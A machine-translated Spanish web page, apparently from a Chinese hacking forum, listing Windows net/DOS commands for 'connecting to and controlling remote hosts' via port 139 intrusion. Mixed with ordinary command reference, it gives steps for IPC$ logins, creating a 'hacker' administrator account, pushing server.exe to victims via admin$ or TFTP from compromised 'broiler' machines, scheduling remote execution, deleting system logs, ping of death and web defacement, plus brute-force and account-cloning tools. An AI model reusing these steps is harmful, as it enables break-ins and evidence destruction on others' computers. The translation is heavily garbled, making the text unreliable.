Red de conocimiento informático - Conocimiento informático - ¿Cómo conectarse a un host remoto mediante el comando DOS y cómo controlarlo después de la conexión?

¿Cómo conectarse a un host remoto mediante el comando DOS y cómo controlarlo después de la conexión?

Los comandos comunes de DOS establecen conexiones con hosts remotos.

net usa \\ip\ipc$ "contraseña"

/usuario: "nombre de usuario"

Crear un nuevo usuario

Red Nombre de usuario y contraseña/Agregar

Cambiar contraseña de usuario

Red

Nombre de usuario y nueva contraseña

Activar usuario

Nombre de usuario del usuario de red

/Activo: Sí

Agrega el usuario al grupo de usuarios.

nombre del grupo local de red nombre de usuario

/Agregar

Ver la hora del host remoto

Tiempo neto\\ip

Muestra la * * * lista de recursos compartidos del host remoto.

Vista de red

\\ip

Iniciar y detener servicios del sistema

Nombre del servicio de inicio (detención) de red

Asignar el disco duro de la otra parte

Uso neto z:

\\ip\c$

Iniciador

En \\ Programa ip Time

Archivar original

Copiar nombre de archivo

\\ip\c$\filename

Ejecución remota de comando FTP

echo nombre de servidor abierto & gtc:\ftp.txt

Echo

Nombre de usuario& gt& gtc:\ftp.txt

Contraseña de eco& gt& gtc: \ftp.txt

echo get

Nombre de archivo c:\ nombre de archivo & gt;& gtc:\ftp.txt

ftp -s: c:\ ftp.txt

Triángulo invertido

c:\ftp.txt

Eliminar registro

del c:\ win nt \system32\ archivos de registro\*. *

Triángulo invertido

c:\win nt\s system 32\config\*. Temperatura de isoviscosidad

del c:\winnt\system32\dtclog\*. *

Triángulo invertido

c:\winnt\system32\*. log

del c:\winnt\system32\*. Archivo de texto (textfile)

del c:\winnt\*. Archivo de texto (textfile)

del c:\winnt\*. Registros

Visítense * * * para disfrutar de los recursos.

Uso de red\\192.168.1.1\c$

/Usuario:admin "123"

Si la conexión es exitosa, estás ingresando.

Inicio\\192.168.1.1\c$

Abra la unidad c de la máquina de destino.

-

net usa \\ip\ipc$ " "

/user:" " para establecer un enlace IPC vacío.

Net utiliza \\ip\ipc$ "contraseña" /usuario:"nombre de usuario" para establecer un enlace ipc no vacío.

Uso de red

H: \\ip\c$ "contraseña"/usuario: "nombre de usuario" para iniciar sesión directamente, asignado al C: local de la otra parte, que es H :

net usa h: \\ip\c$

para mapear a la otra parte después de iniciar sesión. C: H:

Net usa \\ip\ipc$ /del para eliminar el enlace ipc.

Net use h: /del

Use H: para eliminar la asignación del socio mapeado al socio local.

Nombre de usuario y contraseña de red/Agregar para crear un usuario.

Usuario de Red Invitado/Actividad: Sí

Activar Usuario Invitado

Usuario de Red para ver qué usuarios hay allí.

Nombre de la cuenta de usuario de Net para ver las propiedades de la cuenta.

Grupo local de red

Nombre de usuario del administrador/Agregar Agregue "usuario" a Administradores para que tenga derechos de administrador. Nota: agregue la s plural después de administrador.

Red

Empiece a ver qué servicios están activados.

El nombre del servicio de inicio de red inicia el servicio (por ejemplo, inicio de sesión remoto de la red, programación de inicio de la red)

El nombre del servicio de parada de red detiene el servicio.

Tiempo neto \\IP de destino verifica el tiempo de la otra parte.

Tiempo neto\\IP de destino/Grupo

Establezca la hora de la computadora local que se sincronizará con la hora del host "IP de destino" y agregue el parámetro /yes para cancelar la confirmación. mensaje.

Ver qué * * * privilegios están habilitados en la LAN local.

Red

Ver \\ip para ver qué * * * permisos están habilitados en la LAN de la otra parte.

Configuración de red muestra la configuración de red del sistema.

Desconexión de red sin conexión* * *Disfrutar

Red

Suspender nombre del servicio Suspender el servicio.

Net send ip "SMS" envía un mensaje a la otra parte.

Tipo de conexión de red e información de la red.

Comparte en línea para ver el disfrute * * * local.

Net share ipc$ está abierto a ipc$*** para su disfrute.

Partición neta ipc$ /del

Eliminar ipc$***

Partición neta c$ /del eliminar c:* * * *Disfruta.

Invitado internauta 12345

Después de iniciar sesión como usuario invitado, cambie la contraseña a 12345.

La contraseña de red cambia la contraseña de inicio de sesión del sistema.

netstat -a

Comprueba qué puertos están abiertos, normalmente netstat -an.

Netstat -n comprueba la conexión de red del puerto, normalmente netstat -an.

netstat -v

Ver el trabajo en curso

netstat -p ejemplo de nombre de protocolo: netstat -p tcq/ip Ver el uso del protocolo (ver el uso del protocolo tcp/IP ).

Netstat -s muestra el uso de todos los protocolos en uso.

nbtstat -A ip

Si uno de los puertos 136 a 139 de la otra parte está abierto, puede verificar el nombre de usuario que inició sesión más recientemente (nombre de usuario anterior a 03) - Nota: El parámetro -A debe estar en mayúscula.

Parámetro Tracert

Ruta de seguimiento de IP (o nombre de computadora) (paquete). Parámetro: "-w número" se utiliza para establecer el intervalo de tiempo de espera.

Ping ip (o nombre de dominio)

Envía datos con un tamaño predeterminado de 32 bytes al otro host y el parámetro es "-l[espacio]tamaño de paquete"; -n veces para enviar datos"; "-t" significa hacer ping todo el tiempo.

Ping -t -l

65550 ip ping of death (envía archivos de más de 64K, el ping continuamente se convierte en ping of death)

Para Windows Ipconfig (winipcfg )

NT y XP (Windows 95 98) ven la dirección IP local, ipconfig puede usar el parámetro "/all" para mostrar toda la información de configuración.

tlist -t

Muestra el proceso en una lista de líneas de árbol (como herramienta adicional del sistema, no se instala por defecto y se encuentra en la carpeta Soporte/herramientas del directorio de instalación).

Nombre del proceso de terminación

Forzar la finalización de un proceso después de agregar el parámetro -F (es una herramienta adicional del sistema, no se instala por defecto y se encuentra en el soporte/herramientas). carpeta del directorio de instalación).

Nombre del archivo

Después de agregar el parámetro -F, los archivos de solo lectura se pueden eliminar. /AR, /AH, /AS y /AA significan eliminar archivos de solo lectura, ocultos, del sistema y de almacenamiento, respectivamente. /A-R, /A-H, /A-S y /A-A significan eliminar archivos excepto archivos de solo lectura, ocultos, del sistema y de archivo. Por ejemplo, "DEL/AR"

*.* "significa eliminar todos los archivos de sólo lectura en el directorio actual", DEL/A-S *. * "significa eliminar todos los archivos en el directorio actual excepto los archivos del sistema.

#2 Segundo:

Directorio de entrega/ventas/calidad

O use: rmdir /s /Q directorio /S elimina el directorio y todos los subdirectorios y archivos que contiene. Al mismo tiempo, use el parámetro /Q para cancelar la operación de eliminación y elimínelo directamente después de que el sistema lo confirme (los dos comandos tienen el mismo efecto).

Mueva la letra de unidad\ruta\ruta para almacenar el nombre del archivo que se va a mover\Después de mover el nombre del archivo, use el parámetro /y para cancelar el mensaje y confirme que el mismo archivo existe en el directorio movido. y sobrescríbalo directamente

Football Club. (Football Club)

one txt two 3t.txt Compara dos archivos y genera las diferencias en archivos 3t.txt. ">" y ">"

<. p>Este es un comando de redirección

Abra la tarea programada registrada en el número de identificación.

En /delete detiene todas las tareas programadas. Utilice el parámetro /yes para detenerlas directamente sin confirmación.

Detener la tarea programada registrada en

Número de identificación/eliminar.

Ver todas las tareas programadas.

En \\ip time nombre del programa (o comando)/r

Ejecute un programa de la otra parte en un momento determinado y reinicie la computadora.

Presiona nombre de usuario @host para ver qué usuarios han iniciado sesión recientemente.

Puerto IP Telnet

Servidor de inicio de sesión de Yuanhe, el puerto predeterminado es 23.

Abra ip connect to IP (comando después de iniciar sesión en telnet)

Escriba directamente en esta computadora.

Entrará al telnet de esta máquina.

Copia ruta\nombre de archivo1 ruta\nombre de archivo2 /y

Copie el archivo 1 como archivo 2 en el directorio especificado y sobrescriba el archivo del directorio existente cuando desee. Utilice el parámetro /y para cancelar la confirmación. .

Copia el archivo c:\srv.exe \\ip\admin$

Copia el c:\srv.exe local al administrador de la otra parte.

cppy 1st .jpg/b+2st . txt/a 3st.jpg

Oculta el contenido de 2st.txt en 1st.jpg y genera un nuevo archivo en 0st.jpg. Nota: El encabezado del archivo 2st.txt debe tener tres líneas vacías. Parámetros: /b se refiere al archivo binario, /a se refiere al archivo en formato ASCLL.

copiar\\IP\admin$\svv.exe c:\ o:copiar\\IP\admin$\*. *

Copie los archivos srv.exe (todos los archivos) propiedad de otros administradores$*** al C local:

Xcopiar archivo o dirección de destino del árbol de directorios\nombre del directorio

p>

Copia archivos y árboles de directorios y sobrescribe archivos idénticos sin solicitar el parámetro /y.

TFTP: mi propia IP (cuando use una máquina de carne como trampolín, use la IP de la máquina de carne) para obtener server.exe.

Después de iniciar sesión en C:\server.exe, descargue el server.exe de "IP" al host de destino C:\server.exe.

Parámetro: -i significa enviar en modo binario, como cuando se envía un archivo exe, o enviar en modo ASCII (modo de archivo de texto) sin usar -I.

Tftp -i peer IP put

Después de iniciar sesión con C:\server.exe, cargue el c:\server.exe local en el host.

Puerto ftp ip

Se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21. Bin se refiere a la transmisión binaria (entrada de archivo ejecutable), de forma predeterminada, se transmite en formato ASCII (si es un archivo de texto).

Ruta

Imprime y muestra el enrutamiento IP, mostrando principalmente la dirección de red, la máscara de subred y la dirección de la puerta de enlace.

Dirección, interfaz dirección interfaz

Arp verifica y procesa el caché ARP. ARP significa Resolución de nombres y es responsable de resolver direcciones IP en direcciones MAC físicas. alp

-a mostrará toda la información.

Inicie el nombre del programa o comando /max o /min para abrir una nueva ventana y maximizar (minimizar) ejecutar un programa o comando.

Memoria

Verificar el uso de la CPU

Nombre del archivo Attrib (nombre del directorio) para ver los atributos del archivo (directorio).

Nombre de archivo de atributo -A -R -S -H o +A +R +S

+H elimina (agrega) los atributos de archivo, de solo lectura, de sistema y ocultos de el archivo; con+ se agrega como atributo.

Directorio

Ver archivos. Parámetros: /Q muestra a qué usuario pertenecen los archivos y directorios, /T:C muestra la hora de creación del archivo, /T:A muestra la hora del último acceso al archivo y /T:W muestra la hora de la última modificación del archivo .

Fecha/Hora,

Hora/tAl utilizar este parámetro, es decir, "Fecha/T" y "Hora/T", solo se mostrará la fecha y hora actuales sin ingresar una nueva. fecha y hora.

Establecer

Especifique el nombre de la variable de entorno = el carácter que se asignará a la variable Establezca la variable de entorno.

Set muestra todas las variables de entorno actuales.

Establecer p (u otros caracteres)

Mostrar todas las variables de entorno que actualmente comienzan con el carácter p (u otros caracteres)

Pausar el programa por lotes y mostrar: Por favor presione cualquier tecla para continuar. ....

Si

Realizar procesamiento condicional en un programa por lotes (consulte el comando y las variables para obtener más instrucciones)

Ir a la etiqueta

Dirija cmd.exe a la línea etiquetada en el programa por lotes (la etiqueta debe ser una línea separada y comenzar con dos puntos, por ejemplo: etiqueta ":start").

Ruta de llamada\nombre del archivo por lotes

Llamar a otro programa por lotes desde un programa por lotes (ver llamada/?)

Para un conjunto de archivos Cada archivo se ejecuta un comando específico (consulte comandos y variables para obtener más detalles).

Echo activado o desactivado Activa o desactiva el eco, muestra la configuración actual del eco, solo eco, sin parámetros.

Los mensajes de eco muestran información en la pantalla.

Echo

Mensaje> & gtPass.txt Guarda "Mensaje" en el archivo pass.txt.

findstr "Hello" aa.txt

Busca la cadena hola en el archivo aa.txt.

Buscar nombre de archivo Buscar archivo

Título Nombre de título Cambia el nombre del título de la ventana CMD.

Valor de color

Establece los colores de primer plano y fondo de la consola cmd 0 = negro, 1 = azul, 2 = verde, 3 = verde claro, 4 = rojo, 5 = morado, 6=amarillo, 7=blanco, 8=gris, 9=azul claro, a=verde claro, B=verde claro, C=rojo claro, D=morado claro.

El nombre del mensaje cambia el símbolo del sistema mostrado por cmd.exe (cambie C:\, D:\ a: EntSky\).

Intrusión del puerto 139

Red

El comando es la parte más importante de la intrusión del puerto 139 y se utilizará muchas veces durante todo el proceso de intrusión. Ingrese net en la ventana de la línea de comando y podrá ver que hay muchos parámetros. No te dejes intimidar por tantos parámetros.

Ahora déjame explicártelo uno por uno.

NET

USE

NET

El comando se utiliza para establecer una conexión IPC$ (administración) a un host remoto. Cuando tenga el nombre de usuario y la contraseña de la computadora remota (generalmente el nombre de usuario es administrador, recuerde), ingrese net en la ventana de la línea de comando.

Utilice \\IP\IPC$"contraseña"/usuario:administrador para establecer exitosamente una conexión con la computadora remota. Entonces se podrá gestionar. Otro uso de net

use es mapear los * * * recursos compartidos de la máquina remota. Ingrese net usando z: \\IP\C$.

(¡Nota! Todos los comandos posteriores se basan en el primer comando, es decir, la conexión IPC$ debe establecerse primero antes de que estos comandos puedan tener éxito). Abra "Mi PC" y encontrará muchos de los que tengo. una unidad Z y la unidad C del host remoto está llena de cosas. Si elimina un archivo en la unidad Z, los archivos en la otra unidad C también se eliminarán. Todas las operaciones en la unidad Z son en realidad C en la computadora remota.

Operaciones en disco. ¿Qué tal? ¿No es interesante?

Vista de red

La vista de red se utiliza para ver qué recursos tiene la computadora remota. Generalmente verás el mío.

Para * * * carpetas compartidas como documentos, simplemente ingrese net view \\IP. Personalmente, no creo que Netscape

sea muy útil. Ya sabes, en Windows 2000, cada disco duro es * * * compartido, pero si usas net view para verlo, encontrarás que no hay C, D, ed y E.

* * *Disfruta de recursos como este. ¿Por qué es esto? Tenga en cuenta que en algunos de los comandos anteriores, hemos ingresado cosas extrañas como IPC$, C$ y C$. De hecho, en Windows 2000, * * los recursos con el sufijo "$" están ocultos y no se pueden ver en la ventana de la línea de comandos. En Windows 2000, todos los discos se basan en elementos como C$, D$ y E$.

Ese nombre es * * *, por lo que no podemos verlo, pero existe, al igual que IPC$.

Compartir red

El uso compartido de red se utiliza para abrir * * * e ingresar a la red.

Comparta QQ=c:\tencent, encontrará un * * * recurso adicional llamado QQ. ¿Cuál es el efecto de este comando? Supongamos que el host hace un buen trabajo en seguridad y desactiva IPC$, C$, D$.

Esperando * * * disfrute, entonces no podremos establecer una conexión de administración en el puerto 139 y no podremos acceder a la unidad c de la otra parte. Cuando ingresamos a través de otros métodos (como el desbordamiento remoto), podemos usar net share.

Abra IPC$, que se convierte en el conocido puerto de intrusión 139. El comando para abrir IPC$ es net share IPC$. En consecuencia, si desea desactivar el disfrute * * *, puede agregar el sufijo /del, como net.

La acción c$/del cierra el * * * disfrute de la unidad c.

Usuario de red

El comando net user se utiliza para administrar usuarios en el host. Solo puede ingresar net sin ningún parámetro.

Usuarios enumera todos los nombres de usuario en la computadora. Ahora veamos a los usuarios de la red.

Cómo afecta el comando a los usuarios.

┎───────────────────────────────────── ─── ── ───────────┒

Usuario de red hacker 12345 /add crea un usuario llamado hacker con una contraseña de 12345.

┃Usuario de red hacker /del

Eliminar el usuario llamado hacker. ┃

┃Hacker de usuario de red

/active:no desactiva el hacker de usuario. El usuario ya no puede iniciar sesión en la computadora.

┃Network User Hacker

/active:yes activa usuarios hackers deshabilitados. ┃

┃Grupo local de red

Administrador Hacker/Agregar Agregar usuario hacker al grupo de administradores, es decir, mejorar los permisos del hacker y convertirlo en administrador.

┖───────────────────────────────────── ─── ── ───────────┚

Inicio de red/

Parada de red

El comando de inicio de red/parada de red se utiliza para iniciar/detener servicios del sistema. Normalmente bloquearíamos w3svc.

(Detenga el servicio web) y luego reemplace la página web. No entraré en detalles sobre este comando, sólo conócelo.

*comando at, net

Tiempo

La razón por la que se juntan es porque el comando at requiere el resultado del comando net time. Generalmente comenzamos con la vista de red.

\\ip, obtenga la hora del host remoto (suponiendo que sean las 9:00) y luego haga telnet a las 9:00 en \\IP.

Inicie el servicio Telnet y utilice el comando para ejecutar el programa de forma remota.

(5) Herramientas necesarias

Broiler Hunter v1.0 escanea un segmento de red y encuentra computadoras con contraseñas débiles.

SMBCrack

Adivinación de contraseña por fuerza bruta para un host específico.

Pantalla de operación de monitoreo del control remoto DameWare Mini

CA.exe

Clonar cuenta de administrador